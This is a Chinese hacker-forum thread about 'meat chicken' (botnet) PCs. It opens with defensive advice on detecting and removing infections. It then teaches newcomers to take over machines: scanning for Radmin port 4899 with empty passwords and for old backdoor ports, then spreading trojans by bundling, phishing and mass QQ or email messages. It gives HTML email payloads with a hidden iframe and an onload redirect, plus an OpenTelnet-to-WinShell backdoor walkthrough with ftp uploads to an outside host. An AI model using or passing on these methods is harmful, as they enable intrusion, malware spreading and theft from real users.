内容横多

        咱缠缠绵绵的讲：

            首先要知道什么是肉鸡：
所谓电脑肉鸡[sup][1][/sup]，就是拥有管理权限的远程电脑。也就是受别人控制的远程电脑。肉鸡可以是各种系统,如win,[url=http://baike.baidu.com/view/1634.htm]linux[/url],[url=http://baike.baidu.com/view/8095.htm]unix[/url]等；更可以是一家公司\企业\学校甚至是政府军队的[url=http://baike.baidu.com/view/899.htm]服务器[/url]，一般所说的肉鸡是一台开了[url=http://baike.baidu.com/view/102805.htm]3389端口[/url]的Win2K系统的服务器,所以3389端口没必要开时关上最好。

　　要登陆肉鸡，必须知道3个参数：远程电脑的[url=http://baike.baidu.com/view/8370.htm]IP[/url]、用户名、密码。

　　说到肉鸡，就要讲到[url=http://baike.baidu.com/view/51293.htm]远程控制[/url]。远程控制软件例如[url=http://baike.baidu.com/view/25407.htm]灰鸽子[/url]、上兴等。

　　肉鸡不是吃的那种，是中了[url=http://baike.baidu.com/view/931.htm]木马[/url]，或者留了后门，可以被远程操控的机器，现在许多人把有WEBSHELL 权限的机器也叫肉鸡。

　　谁都不希望自己的电脑被他人控制，但是很多人的电脑是几乎不设防的，很容易被远程攻击者完全控制。你的电脑就因此成为别人砧板上的肉，别人想怎么吃就怎么吃，肉鸡(机)一名由此而来。

 

如何检测自己是否成为肉鸡
注意以下几种基本的情况：
　　1：QQ、MSN的异常登录提醒 （系统提示上一次的登录IP不符）
　　2：网络游戏登录时发现装备丢失或与上次下线时的位置不符，甚至用正确的密码无法登录。
　　3：有时会突然发现你的鼠标不听使唤，在你不动鼠标的时候，鼠标也会移动，并且还会点击有关按钮进行操作。
　　4：正常上网时，突然感觉很慢，硬盘灯在闪烁，就象你平时在COPY文件。
　　5：当你准备使用摄像头时，系统提示，该设备正在使用中。
　　6：在你没有使用网络资源时，你发现网卡灯在不停闪烁。如果你设定为连接后显示状态，你还会发现屏幕右下角的网卡图标在闪。
　　7：服务列队中出可疑程服务。
　　8：宽带连接的用户在硬件打开后未连接时收到不正常数据包。（可能有程序后台连接）
　　9：防火墙失去对一些端口的控制。
　　10：上网过程中计算机重启。
　　11：有些程序如杀毒软件防火墙卸载时出现闪屏（卸载界面一闪而过，然后报告完成。）
　　12：一些用户信任并经常使用的程序（QQ`杀毒）卸载后。目录文仍然存在，删除后自动生成。
　　13：电脑运行过程中或者开机的时候弹出莫名其妙的对话框
　　以上现象，基本是主观感觉，并不十分准确，但需要提醒您注意。
　　接下来，我们可以借助一些软件来观察网络活动情况，以检查系统是否被入侵。
　　1.注意检查防火墙软件的工作状态
　　比如金山网镖。在网络状态页，会显示当前正在活动的网络连接，仔细查看相关连接。如果发现自己根本没有使用的软件在连接到远程计算机，就要小心了。
　　2.推荐使用tcpview，可以非常清晰的查看当前网络的活动状态。
　　一般的木马连接，是可以通过这个工具查看到结果的。
　　这里说一般的木马连接，是区别于某些精心构造的rootkit木马采用更高明的隐藏技术，不易被发现的情况。
　　3.使用金山清理专家进行在线诊断，特别注意全面诊断的进程项
　　清理专家会对每一项进行安全评估，当遇到未知项时，需要特别小心。
　　4.清理专家百宝箱的进程管理器
　　可以查找可疑文件，帮你简单的检查危险程序所在

54一切

如何避免自己的电脑成为“肉鸡”
1.关闭高危端口：
　　第一步，点击“开始”菜单/设置/控制面板/管理工具，双击打开“本地安全策略”，选中“IP 安全策略，在本地计算机”，在右边窗格的空白位置右击鼠标，弹出快捷菜单，选择“创建 IP 安全策略”，于是弹出一个向导。在向导中点击“下一步”按钮，为新的安全策略命名；再按“下一步”，则显示“安全通信请求”画面，在画面上把“激活默认相应规则”左边的钩去掉，点击“完成”按钮就创建了一个新的IP 安全策略。
　　第二步，右击该IP安全策略，在“属性”对话框中，把“使用添加向导”左边的钩去掉，然后单击“添加”按钮添加新的规则，随后弹出“新规则属性”对话框，在画面上点击“添加”按钮，弹出IP筛选器列表窗口；在列表中，首先把“使用添加向导”左边的钩去掉，然后再点击右边的“添加”按钮添加新的筛选器。
　　第三步，进入“筛选器属性”对话框，首先看到的是寻址，源地址选“任何 IP 地址”，目标地址选“我的 IP 地址”；点击“协议”选项卡，在“选择协议类型”的下拉列表中选择“TCP”，然后在“到此端口”下的文本框中输入“135”，点击“确定”按钮（如左图），这样就添加了一个屏蔽 TCP 135（RPC）端口的筛选器，它可以防止外界通过135端口连上你的电脑。
　　点击“确定”后回到筛选器列表的对话框，可以看到已经添加了一条策略，重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口，为它们建立相应的筛选器。
　　重复以上步骤添加TCP 1025、2745、3127、6129、3389 端口的屏蔽策略，建立好上述端口的筛选器，最后点击“确定”按钮。
　　第四步，在“新规则属性”对话框中，选择“新 IP 筛选器列表”，然后点击其左边的圆圈上加一个点，表示已经激活，最后点击“筛选器操作”选项卡。在“筛选器操作”选项卡中，把“使用添加向导”左边的钩去掉，点击“添加”按钮，添加“阻止”操作（右图）：在“新筛选器操作属性”的“安全措施”选项卡中，选择“阻止”，然后点击“确定”按钮。
　　第五步,进入“新规则属性”对话框，点击“新筛选器操作”，
　　其左边的圆圈会加了一个点，表示已经激活，点击“关闭”按钮，关闭对话框；最后回到“新IP安全策略属性”对话框，在“新的IP筛选器列表”左边打钩，按“确定”按钮关闭对话框。在“本地安全策略”窗口，用鼠标右击新添加的 IP 安全策略，然后选择“指派”。
　　重新启动后，电脑中上述网络端口就被关闭了，病毒和黑客再也不能连上这些端口，从而保护了你的电脑。
　　2.及时打补丁 即升级杀毒软件
　　
　　肉鸡捕猎者一般都是用“灰鸽子”病毒操控你的电脑，建议用灰鸽子专杀软件杀除病毒。
　　3.经常检查系统
　　经常检查自己计算机上的杀毒软件，防火墙的目录，服务，注册表等相关项。
　　黑客经常利用用户对它们的信任将木马隐藏或植入这些程序。
　　警惕出现在这些目录里的系统属性的DLL。（可能被用来DLL劫持）
　　警惕出现在磁盘根的pagefile.sys.(该文件本是虚拟页面交换文件。也可被用来隐藏文件。要检查系统的页面文件的盘符是否和它们对应)
  下面我发个工具
这是关闭一些端口漏洞的工具。
  如果不相信可以不下载。

成为肉鸡后的自救方法
　　一、正在上网的用户，发现异常应首先马上断开连接
　　如果你发现IE经常询问是你是否运行某些ActiveX控件，或是生成莫名其妙的文件、询问调试脚本什么的，一定要警惕了，你可能已经中招了。典型的上网被入侵有两种情况：
　　一是浏览某些带恶意代码的网页时候被修改了浏览器的默认主页或是标题，这算是轻的；还有就是遇到可以格式化硬盘或是令你的Windows不断打开窗口，直到耗尽资源死机——这种情况恶劣得多，你未保存和已经放在硬盘上的数据都可能会受到部分或全部的损失。
　　二是潜在的木马发作，或是蠕虫类病毒发作，让你的机器不断地向外界发送你的隐私，或是利用你的名义和邮件地址发送垃圾，进一步传播病毒；还有就是黑客的手工入侵，窥探你的隐私或是删除破坏你的文件。
　　自救措施：马上断开连接，这样在自己的损失降低的同时，也避免了病毒向更多的在线电脑传播。请先不要马上重新启动系统或是关机，进一步的处理措施请参看后文。
　　二、中毒后，应马上备份、转移文档和邮件等
　　中毒后运行杀毒软件杀毒是理所当然的了，但为了防止杀毒软件误杀或是删掉你还未处理完的文档和重要的邮件，你应该首先将它们备份到其他储存媒体上。有些长文件名的文件和未处理的邮件要求在Windows下备份，所以上文笔者建议你先不要退出Windows，因为病毒一旦发作，可能就不能进入Windows了。
　　不管这些文件是否带毒，你都应该备份，用标签纸标记为“待查”即可。因为有些病毒是专门针对某个杀毒软件设计的，一运行就会破坏其他文件，所以先备份是防患于未然的措施。等你清除完硬盘内的病毒后，再来慢慢分析处理这些额外备份的文件较为妥善。
　　三、需要在Windows下先运行一下杀CIH的软件（即使是带毒环境）
　　如果是发现了CIH病毒，要注意不能完全按平时报刊和手册建议的措施，即先关机、冷启动后用系统盘来引导再杀毒，而应在带毒的环境下也运行一次专杀CIH的软件。这样做，杀毒软件可能会报告某些文件受读写保护无法清理，但带毒运行的实际目的不在于完全清除病毒，而是在于把CIH下次开机时候的破坏减到最低，以防它在再次开机时破坏主板的BIOS硬件，导致黑屏，让你下一步的杀毒工作无法进行。
　　四、需要干净的DOS启动盘和DOS下面的杀毒软件
　　到现在，就应该按很多杀毒软件的标准手册去按部就班地做。即关机后冷启动，用一张干净的DOS启动盘引导；另外由于中毒后可能Windows已经被破坏了部分关键文件，会频繁地报告非法操作，所以Windows下的杀毒软件可能会无法运行。所以请你也准备一个DOS下面的杀毒软件以防万一。
　　即使能在Windows下运行杀毒软件，也请用两种以上工具交叉清理。在多数情况下Windows可能要重装，因为病毒会破坏掉一部分文件让系统变慢或出现频繁的非法操作。比如即使杀了CIH，微软的Outlook邮件程序也是反应较慢的。建议不要对某种杀毒软件带偏见，由于开发时候侧重点不同、使用的杀毒引擎不同，各种杀毒软件都是有自己的长处和短处的，交叉使用效果较理想。
　　五、如果有Ghost和分区表、引导区的备份，用之来恢复一次最保险
　　如果你在平时用Ghost备份做了Windows的，用之来镜像一次，得到的操作系统是最保险的。这样连潜在的未杀光的木马程序也顺便清理了。当然，这要求你的Ghost备份是绝对可靠的。要是作Ghost的时候把木马也“备份”了就后患无穷了。
　　六、再次恢复系统后，更改你的网络相关密码
　　包括登录网络的用户名、密码，邮箱的密码和QQ的密码等，防止黑客用上次入侵过程中得到的密码进入你的系统。另外因为很多蠕虫病毒发作会向外随机发送你的信息，所以及时地更改是必要的

下面是肉鸡的价值
可以不看，如果你想学习肉鸡，可以看看

电脑肉鸡的商业价值
　　1.盗窃“肉鸡”电脑的虚拟财产
　　虚拟财产有：网络游戏ID帐号装备、QQ号里的Q币、联众的虚拟荣誉值等等。虚拟财产，是可以兑现为真实货币的，多少不限，积累起来就是财富。
　　2.盗窃“肉鸡”电脑里的真实财产
　　真实财产包括：网上银行，大众版可以进行小额支付，一旦你的网银帐号被盗，最多见的就是要为别人的消费买单了。此外，还有网上炒股，证券大盗之类的木马不少，攻击者可以轻易获得网上炒股的帐号，和银行交易不同的是，攻击者不能利用偷来的炒股帐号直接获益，这是由股票交易的特殊性决定的。不然，网上炒股一定会成为股民的噩梦。
　　相当多的普通电脑用户不敢使用网上银行，原因就是不了解该怎样保护网上银行的帐号安全。事实上，网上银行的安全性比网上炒股强很多。正确使用网上银行，安全性和便利性都是有保障的。
　　3.盗窃他人的隐私数据
　　陈冠希事件，相信大家都知道，如果普通人的隐密照片、文档被发布在互联网上，后果将会十分严重。利用偷来的受害人隐私信息进行诈骗、勒索的案例不少。
　　还有攻击者热衷于远程控制别人的摄像头，满足偷窥他人隐私的邪恶目的。
　　如果偷到受害人电脑上的商业信息，比如财务报表、人事档案，攻击者都可以谋取非法利益。
　　4.可利用受害人的人脉关系获取非法利益
　　你或许认为你的QQ号无足轻重，也没QQ秀，也没Q币。实际上并非如此，你的QQ好友，你的Email联系人，手机联系人，都是攻击者的目标，攻击者可以伪装成你的身份进行各种不法活动，每个人的人脉关系都是有商业价值的。
　　最常见的例子就是12590利用偷来的QQ号群发垃圾消息骗钱，还有MSN病毒，自动给你的联系人发消息骗取非法利益。
　　5.在肉鸡电脑上种植流氓软件，自动点击广告获利
　　这种情况下，会影响你的上网体验，相信所有人都很讨厌电脑自动弹出的广告。攻击者在控制大量肉鸡之后，可以通过强行弹出广告，从广告主那里收获广告费，流氓软件泛滥的原因之一，就是很多企业购买流氓软件开发者的广告。
　　还有的攻击者，通过肉鸡电脑在后台偷偷点击广告获利，当然，受损的就是肉鸡电脑了。
　　6.以肉鸡电脑为跳板（*****服务器）对其它电脑发起攻击
　　黑客的任何攻击行为都可能留下痕迹，为了更好的隐藏自己，必然要经过多次*****的跳转，肉鸡电脑充当了中介和替罪羊。攻击者为传播更多的木马，也许会把你的电脑当做木马下载站。网速快，机器性能好的电脑被用作*****服务器的可能性更大。
　　7.“肉鸡”电脑是发起DDoS攻击的马前卒
　　DDoS，你可以理解为网络黑帮或网络战争，战争的发起者是可以获取收益的，有人会收购这些网络打手。这些网络黑帮成员，也可以直接对目标主机进行攻击，然后敲诈勒索。“肉鸡”电脑，就是这些网络黑帮手里的一个棋子，DDoS攻击行为已经是网络毒瘤。
　　总之，“肉鸡”电脑是攻击者致富的源泉，在攻击者的圈子里，”肉鸡“电脑就象白菜一样被卖来卖去。在黑色产业链的高端，这些庞大”肉鸡“电脑群的控制者构筑了一个同样庞大又黑暗的木马帝国。

顺便

        让那个小孩子知道肉鸡是怎么捕捉的。


4899是一种国外的远程控制软件所开的默认端口！（那端口是什么呢？我的理解是端口的作用就是把好多计算机向你发来的信息分别从不同的管道给你！每个管道就是一个端口！并有标号！并且有的标号和一类信息是对应的！比如：从25的管道（端口）传来的信息就对应着邮件类！从80管道传来的信息就是网页信息！还有的就没有的不常用的信息，就临时开一个任意（在大于1024端口！1024之前是是一些一一对应的管道！）管道来接受信息！所以端口的作用就是通过不同的端口接受不同的来接受数据包！不知道大家明白没有！还不明白就自己查资料啊！如果我说的有错误！请尽快和我说啊！）该软件叫Radmin！分两部分！控制端和服务端！有很多服务功能！如：通过远程图形控制！（就象操作自己的计算机一样操作对方的计算机！）Telnet功能，telnet是的远程登陆等功能！是在命令下实现的！你可以简单认为是远程操作对方的dos窗口！（其实我就是这么认为的！呵呵）上传下载文件的功能！这个功能大家很明白！就是可以在你和对方计算机之间互相传送文件！还有其他功能，等等！我做了个动画！其实这个软件不是大家所认为的木马！（之所以不是木马！因为其功能都不符合木马的要求！）只是一个普通的远程控制的工具！一些用户用该软件远程管理自己的机器！可以从公司的电脑直接到加里的电脑取文件！或者放文件！管理机器等等！但是不知道为什么！有的用户却不知道为什么不给客户端设置密码！这样我们就有了可乘之机！我们可以用特定工具扫描开4899的机器！（4899这个是Radmin的特征！呵呵！）然后用客户端进行连接！该软件唯一确认你身份的东西就是连接时需要密码！而有的用户却没有设置！所以！我们就可以进入其计算机，并做软件所提供的功能操作！（就是我上面所说的！和一些没有说的！）关于4899的肉鸡，从扫描--到利用，我做了个动画！（动画在菜鸟帝国里有下载！叫:4899的应用,地址:http://fhbandsyg.w5.51web.cn/down_view.asp?id=347还有毛毛做的4899的动画也要看看!站上也有的!自己艘艘把!）大家可以看看！然后自己再照着画瓢！
说完了4899在说说20168，这个是一种叫爱情病毒所开的超级后门端口！如果你中了该病毒，病毒就会在你的机器里开一个20168的端口，使其他人可以通过telnet服务，用命令telnet 你的机器的ip 20168（所有所所的命令都是在dos中键入的！win98的是dos而2000的是命令提示符！）来连接上你的电脑，并且连接后权限很大！可以进行任何级别的命令操作！所以，如果你的机器开了这个端口请你赶快用杀毒软件把他杀掉！不然遇到可恶的入侵者，你的机器可就遭殃了！而从入侵的角度来看！我们就可以用端口扫描工具（如：Port Ready）去扫开20168的机器！然后telnet上去！就可以轻松得到一台机器的shell（shell：简单认为就是一个可以操作远程计算机的dos命令窗口！）并可以进行一切权限的操作！大家可以试试！不过该病毒是个老病毒了！所以可能扫描现在不到了，而且病毒作者只允许利用该端口一次！所以...........但是大家要知道！有很多病毒我们是可以利用的！比如：益出！一场大范围的病毒侵袭后，一般会有高手根据病毒写出相应的益出程序！（什么是益出呢？我那缓冲区益出给大家举例！如果你向一个只能容纳20毫升的杯子里倒入30毫升的牛奶会出现什么情况呢？呵呵！一定就会有10毫升流出了杯子！把这个例子用在缓冲区益出里就是你向计算机“倒入”“30毫升”的数据！而缓冲区只能处理“20毫升”那“10毫升”到那里去了呢？呵呵！可不是象牛奶一样浪费了！，而是把一些别的合法数据给覆盖了！这样如果这“10毫升”数据是一些病毒代码，或者黑客程序，呵呵！后果就可想而知了.............）使我们这些菜鸟可以通过这些程序轻而易举的拿到对中病毒计算机的shell！当然不仅病毒可以益出！微软的很多漏洞都是可以的！所以大家要关注微软的漏洞报告！以便得到新鲜的肉鸡！呵呵！
上面说的一些简单的获得肉鸡的方法！有4899空密码的！病毒开的后门的20168！还有利用漏洞益出的！等等！大家还可能说你怎么不说3389啊！呵呵！是要说说！其实3389是微软提供的远程桌面的服务，英文名字叫“Term Server”所开的端口（端口可以更改）。通过客户端（连接软件），用户帐号来进行图形操作远程的计算机！是windows自带的服务！但不是每个操作系统都有的！win2000的server和2003版本的有还有xp系统的有！而win2000个人板是没有该服务的！通常所说的3389肉鸡是对方开了此服务！并且你有对方的登陆帐号！（注意：帐号权限必须是adm权限！）可以登陆对方计算机进行操作的！所以只要扫开3389端口的机器就可以基本判断哪个计算机开了该服务！然后获得登陆帐号就可以了！但是！！！帐号你怎么获得呢？这是个大问题！但也不是不能！首先你可以利用输入法漏洞！通过这个漏洞你可以直接进入计算机，不用帐号！（具体利用自己找！）但是这个漏洞也是很早的了！现在用户都已经打上了补丁！（但也不是一定没有次漏洞的！）当然你可以用x-scan扫nt弱口令获得对方的登陆帐号！但是个人认为也不是很好！因为现在也很少能扫到若口令的3389的肉鸡了！那么直接获得3389肉鸡是希望不大了！可是3389的肉鸡毕竟是肉鸡中的精品！好处多多的！那怎么获得呢？呵呵！其实3389的获得都是通过别的漏洞入侵了肉鸡后，自己开的3389（远程桌面服务），所以，大家还是先学习别的漏洞的入侵！在学习3389！当然这里涉及到怎么开肉鸡的3389服务！大家就要自己找资料了！
前面提到了x-scan！这个是安全焦点出的一个漏洞扫描分析工具！用在我们手里就是扫描肉鸡的工具！（其实我还不会用！）这里不建议新人使用！因为x-scan确实是大名鼎鼎，很多新人一接触黑客就知道了他！并用他扫啊扫！扫了半天没有任何信息！终于扫到东西了！呵呵！却不知道怎么利用！这也就是为什么我不建议新人用的原因！就是扫到了漏洞不知道该怎么利用！还有流光，也是一样！功能强大！（但是我到今天还摸不到他是怎么用！连怎么添ip都不知道！（本人愚顿！））但比较复杂！当然你如果学习到了一定水平，（知道了里面的 漏洞的利用！）是一定要用这些扫描软件的！现在推荐大家还是去看动画！学习专门的漏洞入侵！用专门的漏洞扫描工具！
最后说几句！大家在找肉鸡时要灵活运用！比如：你扫了很多4899的肉鸡！（一般是些个人用户！但也有服务器！）那么要想找其中是服务器的怎么办呢？呵呵！你可以用scaner！他经过设置后可以扫描已有ip的端口！现在知道怎么做了把！呵呵！一般服务器为了方便管理都会开3389端口的！我们就可以利用这个特征，扫描4899肉鸡中开3389端口的机器！这样.........呵呵！我就不细说了！关于scaner的应用！大家自己找资料吧！还有啊！有的后门是没有密码的！如winshell（后面会介绍到！）他默认的端口是5277！而有的粗心的黑客不设置直接生成后门！所以！就回留下特征！呵呵！不用我说大家一定知道了！应该扫描开5277端口的机器！然后用相应的连接方法进行连接！就可以获得“同行”“送”你的肉鸡！呵呵！类似的方法还有很多！希望大家能灵活运用！轻松找到多多的肉鸡！

小孩子
    这是怎么孔邦木马

1.用BT制作木马种子

利用BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件

然后捆绑上自己的木马,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦.

2.利用PP共享自己捆了木马的软件或电影.

方法同BT一样,要找诱惑性电影或软件,捆上自己的木马,然后共享自己的目录,这样人

家就会通过搜索找到你的软件或电影.这里电影要配合网页木马.可以参看RealOnePla

ye木马制作.在黑鹰可以找到.当你一打开我们的电影时就会打开我们制作过的网页木

马.这样看电影也会中我们的马.

3.利用QQ邮箱传播木马.

这里主要点HTML格式----在里面写上以下这段代码:

<body onload="window.location='你的网页木马地址';"> </body>

当人家一打开你发过去的邮件时,就会中我们的木马.

4.QQ群发网页木马。

　

首先，你要申请多个QQ号，然后找款QQ消息群发器（黑鹰网站可以找到大量相关QQ群

发信息软件，）再然后要加上非常具有诱惑性的消息（肉鸡的多与少与这个直接相关

，），骗取人家点你的网址。最后，在晚上时可以挂在电脑上群发带有网页木马的信

息。相信只要你的信息够诱惑，肉鸡也是成群的。

5.利用163邮箱传播网页木马。

同样，这里用HTML格式，然后填上以下代码：

</html><iframe src="你的网页木马地址" name="zhu" width="0" height="0"

frameborder="0">

对方只要一打开，就会中我们的网页木马。

这里发送邮件时注意一些技巧，我们要加入一些社会工程会。比如对方是爱好车的，

你就在邮件标题上写上关于车的诱惑性标题。目的只有一个，让他点我们带有网页木

马的邮件。

6.利用邮箱群发我们的网页木马。

这里要用到论坛邮箱提取器，这类工具黑鹰也有下载，大家可以找一下。提取大量

邮箱后，配合FOXMAIL这款软件进行群发传播带有网页木马的邮件。这里也要注意技

巧，比如在一个游戏论坛提取的邮箱，你就可以伪装本论坛发给广大游戏玩家,提供

最新游戏外挂下载.然后写上自己的网页木马.大部分都认为信息的真实性而点击.从

而中我们的木马. 这里还可以配合利用HTML格式群发我们的网页木马效果可更佳!

7.捆绑欺骗

这也是比较常用的传播木马技术.把木马捆在游戏,流行软件上,配合以上方法,QQ,邮

箱,BT,论坛,等发布捆了木马的软件.骗取点我们的软件,这样也就同时中了我们的木

马.关于捆绑技术,本人做了三个非常具体详细的语音动画教程.不懂的可以在黑鹰查

找本人的捆绑系列专辑教程.

8.攻破下载点,捆上木马放入下载点.

当我们入侵到一些网站时,看看是否开放21服务,也就是是否提供FTP服务.若入侵到

这类网站,恭喜你,你又可以得到大批量肉鸡.你可以捆上自己的木马然后放入下载点

等待人家上钩吧!该方法抓鸡的速度也非常快.

9.钓鱼式欺骗别人点击你的网页木马地址或木马.

钓鱼式欺骗攻击,也是国内最新发现的一种攻击手法.主要利用社会工程会中的信任

关系骗他点击.具体的利用方法:当盗了人家的QQ号,你可以看看有几个群,然后在群里

放上自己捆绑的木马.接着在群里发几条诱惑性的信息,比如最新申请6位QQ号软件,

由于是在同一个群,可能他们对该QQ号主人有一定的信任度,所以点击的可能性一定

很大.若该QQ号主人是群主或是管理员,哈哈,我们来个更毒的,干脆在公告上写上自己

的网页木马地址,然后说本群刚建的专用网站!由于是群主,他们对他的信任度可想而

知.应该都会点的吧!还有一招,在他QQ的个人资料上或个人签名上填上自己的网页木

马,然后说刚建的个人网站.相信很多好友都会自动点击吧!

10.网站主页挂马

这个应该不用具体介绍吧,教程有N多.入侵到一个网站得到WEBSHELL后,接下来大家

是不是都忙着找首页挂马了.

11.论坛漏洞挂马

这里主要利用论坛的一些漏洞进行挂马,比如最近的动网前台提升管理员,然后挂马,

动网的个人资料过虑不严挂马,还有投票挂马等等.利用这些漏洞进行挂马.也有相关

教程,不是很清楚的可以在黑鹰找到.

12.文件类型伪装

这里主要把一些木马服务端和一些文本文件捆绑在一起,然后通后自解压方式或捆绑

器制作成文本文件类型的可执行文件.但他以为打开一个文本文件时,虽然能正常运行

文本文件,其实已经中了我们的木马.真是神不知鬼不觉!本人也做过文件类型欺骗的

动画教程.不是很清楚的也可以在黑鹰或动画吧找到本人的相关的教程.当然,还要以

伪装成其它的类型,比如把木马制作成BMP图片.BAT格式等.只要他一运行就会中

我们的马.

14.其它的传播技术:比如制作图片木马,也有专门的图片木马制作工具,RM木马制作

黑鹰也有相关教程,RealOnePlayer木马制作,FLASH木马制作.也有专门的制作工具,

网上可以找到相关工具.这些也是比较常用的传播技术.只要你有这方面的思路,都可

以在网上找到相关资料,自己尝试制作.

        二.新型高级木马传播技术

下面介绍几种比较高级的木马传播技术.由于有一定的技术难度,所以隐蔽性比较强,

传播速度也快,而且也几乎不会被杀毒软件查杀.

1.在WORD文档中加入木马文件

这种方法非常隐蔽,在WORD文档尾加入木马文件,只要别人点击这个所谓的WORD文件就

会中木马,这种方法主要是通过把一个EXE格式的木马文件接在一个DOC文件的末尾,使

别人察觉不到木马的存在,因此使之上当受骗.具体实现方法,比较复杂.本人也在进一

步的研究之中.相信在不久这种方法就会流行起来.现在主要被一些高手使用.

2.黑客工具绑木马

其实这本来算不上高级的方法,但最近发现很多黑客软件发布站,捆了木马的工具躲过

管理员的检测.照样发布出来,想像危害性有多大.其实他们就是利用人性的弱点.黑客

工具本来被杀毒软件查杀,捆了木马的工具被查杀就不觉得奇怪了.就会放松警惕.从

而被他们利用.这一招是他们把黑客中的社会工程学利用的"恰到好处"!

3.用Z-file伪装加密木马程序

z-file伪装加密软件是台湾华顺科技产品,其经过将文件压缩加密之后,再以bmp图像

文件格式显示出来,扩展名是bmp,执行后是幅普通的图像.黑客会将木马程序和小游戏

合拼,再用z-file加密及将此"混合体"发给受害者,由于看上去是图像文件,受害者往

往不以为然,打开后又只是一般的图片,最可怕的地方还在于就连杀毒软件也检测不出

它内藏木马.

4.伪装成应用程序扩展组件

此类属于最难识别的特洛伊木马,也是骗术最高的木马,当然技术实现也有相当的难度

由于涉及到编程,所以我这里只简单介绍原理,以供参考.

采用内核插入式的嵌入方式,利用远程插入线程技术,嵌入DLL线程,或者挂接PSAPI,实

现木马程序的隐藏.

5.通过QQ病毒,QQ蠕虫,QQ尾巴或邮箱病毒,蠕虫进行传播.

相信利用这些技术进行传播木马的速度是最快的.这里要下载病毒,蠕虫源代码.进行

分析.修改.加入我们的网页木马地址.然后传播到网上,这样就会一传十,十传百,指数

级上升,自动为我们传播木马.这种传播速度是惊人的.网上也可找到相关QQ蠕虫制作

器,菜鸟朋友就可以直接制作自己的带有网页木马的蠕虫了.最近的唐山黑客就是利用

QQ尾巴传播自己的木马,感染并操控了四万多台民用电脑.进行对北京的一家音乐网站

进行分布式DDOS攻击.利用该技术是相当高级的,速度也是最快的.

好了,教程就到这里,应该相当全面了.这些高级技术, 有兴趣的可以研究一下,相信

一定会有收获.

小孩子

          这是怎么扫描木马

第一步：用scanipc扫描弱口令

不一会就会扫到很多有弱口令的主机(就我的经验在教育网上这样的主机比较多)

第二步：连接刚扫的肉鸡

这里我用opentelnet给扫描到开了空口令的主机开个端口让我们telnet连接上去

,开了23端口，并可以连接上的主机就不用进行次步骤了!

Opentelnet使用方法:

OpenTelnet.exe server <帐号> <密码>

列如:

C:>OpenTelnet.exe 192.168.1.2 administrator 123456 1 90 用户名：administrator 密码：123456

NTLM认证方式:1(也可以选择0请自己测试) 开的端口：90

运行完，如果屏幕上出现 Disconnecting server...Successfully! 就说明已经成功。

这样，我们就能够得到一个开90端口的Telnet服务器了。

Telnet 192.168.1.2 90

这样就可以登录上去了。

第三步：配置并安装后门程序

这里我选择WinShell(小巧精干我喜欢)，用winshell主程序设置好后门，然后把后门程序传到台FTP空间上！

列如:

c:>ftp

ftp>open www.hxhack.com

然后输入用户名字 密码把后门传上去mput c:cnwill.exe

现在我们登陆到肉鸡上 Telnet 192.168.1.2 90

把刚上传的后门程序下载并运行(别忘记删除 后门程序)

[上传后门也可以用net命令完成。

看完之后觉得好的话给点掌声  

      叫一声师傅

                我可以在发表几篇文章。

师傅，你可以教我不？我QQ:415109637，密码老嘿弄

好贴  顶了

  师傅 

、    [email protected](492377697)

                  子曰：好贴不点亮，因死全家。

        子曰：看帖不回复，因*******

师傅 ,教我玩灰鸽子

貌似我是新手

哈哈哈

好贴

LZ  能不能交点容易懂的  那我就天天顶贴